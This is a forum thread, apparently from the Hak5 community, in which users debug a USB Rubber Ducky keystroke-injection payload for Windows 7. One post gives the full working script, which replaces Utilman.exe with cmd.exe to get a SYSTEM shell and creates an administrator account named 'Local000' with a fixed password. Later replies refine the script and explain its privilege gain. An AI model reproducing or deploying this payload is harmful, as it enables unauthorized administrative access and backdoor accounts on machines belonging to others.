mackwage Posted October 5, 2011 Share Posted October 5, 2011 I seem to have issues with the payload as is. The issue seems to be with the below lines: MENU STRING a ENTER I assume this is to right click on the CMD exe and run as administrator. However it seems to right click within the text box of the start menu. Does anyone else have this issue? Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted October 5, 2011 Share Posted October 5, 2011 I haven't seen that behavior, but I'd say a DELAY between MENU and STRING a are in order for sure. That might be the issue in fact. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 5, 2011 Share Posted October 5, 2011 If that fix works, I'll change it on the Wiki as well. Thanks for the heads up. Also, I'm sure a few of the other delays could be removed depending on the speed of the computer you are using... Quote Link to comment Share on other sites More sharing options...
mackwage Posted October 5, 2011 Author Share Posted October 5, 2011 I think it's the actual behavior of Windows. If you manually hit the Windows key, type cmd then hit shift f10, it does the same behavior. Quote Link to comment Share on other sites More sharing options...
mackwage Posted October 5, 2011 Author Share Posted October 5, 2011 Minus the above thing, I had to change the syntax of some of the commands to get it to work on Windows7... specifically the icacls, ren, rmdir commands. As it was, it would prompt for an answer to the ren and rmdir commands so I added the trigger to suppress those. Also, I had to change the icacls syntax to allow full control of Utilman.exe. Then I added a short delay after each GUI command. DELAY 200 GUI r DELAY 50 STRING cmd DELAY 50 ENTER DELAY 50 STRING takeown /f "%systemroot%\System32\Utilman.exe" ENTER DELAY 50 STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T ENTER DELAY 50 STRING cd %systemroot%\System32 ENTER DELAY 50 STRING mkdir util ENTER STRING xcopy cmd.exe util\ ENTER DELAY 50 STRING ren Utilman.exe Utilman.exe.bak ENTER DELAY 50 STRING cd /util ENTER DELAY 50 STRING ren cmd.exe Utilman.exe ENTER DELAY 50 STRING cd .. ENTER DELAY 50 STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\ ENTER DELAY 50 STRING rmdir /s /q util ENTER DELAY 50 STRING exit ENTER DELAY 50 GUI u STRING net user Local000 /add ENTER DELAY 50 STRING net localgroup administrators Local000 /add ENTER DELAY 50 STRING exit ENTER DELAY 50 GUI r STRING cmd ENTER DELAY 50 STRING cd "%systemroot%\System32" ENTER DELAY 50 STRING delete Utilman.exe ENTER DELAY 50 STRING y ENTER DELAY 50 STRING ren Utilman.exe.bak Utilman.exe ENTER DELAY 50 STRING exit ENTER GUI r DELAY 500 STRING cmd DELAY 500 ENTER DELAY 200 STRING net user Local000 * ENTER STRING hak5 ENTER STRING hak5 ENTER STRING exit ENTER Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 5, 2011 Share Posted October 5, 2011 What version of Windows 7 did you run this on? I ran all the commands on Windows 7 Home Premium 64-Bit and they worked perfectly. Also, you may find it easier to add the "DEFAULT_DELAY" command to the start of the script. I will append those changes to the Wiki, as well. Quote Link to comment Share on other sites More sharing options...
mackwage Posted October 5, 2011 Author Share Posted October 5, 2011 Thanks for the tip on the default delay. I am using Win7 Ultimate x64. I manually walked through every step of the script and typed the commands in CMD to view their behavior. icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T This command didn't actually seem to change the permissions unless adding the "/grant administrators:F /T". I did some Google searching on the command to understand more how it works which lead to me adding the last part. STRING xcopy cmd.exe util\ I changed the syntax and added a backslash at the end. Without the backslash at the end, xcopy will prompt and ask if it's a file or a directory. STRING cd /util STRING ren cmd.exe Utilman.exe STRING cd .. I had trouble getting the rename command to interact correctly with the file unless that file was in my working directory. STRING xcopy %systemroot%\System32\util\Utilman.exe %systemroot%\System32\ I couldn't get xcopy to successfully copy from the util folder to the parent directory. I tried all sorts of variations and kept getting errors. So I just used the absolute path name instead. STRING rmdir /s /q util Without the /q trigger, rmdir will prompt you asking if you are sure you wish to delete it. I'm also looking for the correct icacls command to change Utilman.exe back to the default permissions at the end of the script. Pwning the machine or not, I'd hate to leave it vulnerable for someone else to play with. :P Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted October 5, 2011 Share Posted October 5, 2011 Well, that's great. I updated the wiki and also found that just by using xcopy util\Utilman.exe \/ seemed to work. Quote Link to comment Share on other sites More sharing options...
wdbarker Posted April 20, 2014 Share Posted April 20, 2014 What is the purpose of all the utilman.exe machinations? Once you have the administrator mode cmd prompt, running the net user (create), net localgroup and net user (password) work directly. No footprints to clean up, and the same effect. The only use for utilman.exe I've found involves getting a cmd prompt with no logon at all, and your script presupposes a logged on user - with admin privs - that can do the three target commands in the first window. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted April 20, 2014 Share Posted April 20, 2014 The difference is that utilman.exe runs as SYSTEM, not local admin. That means it has higher privileges than the standard local administrator account. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.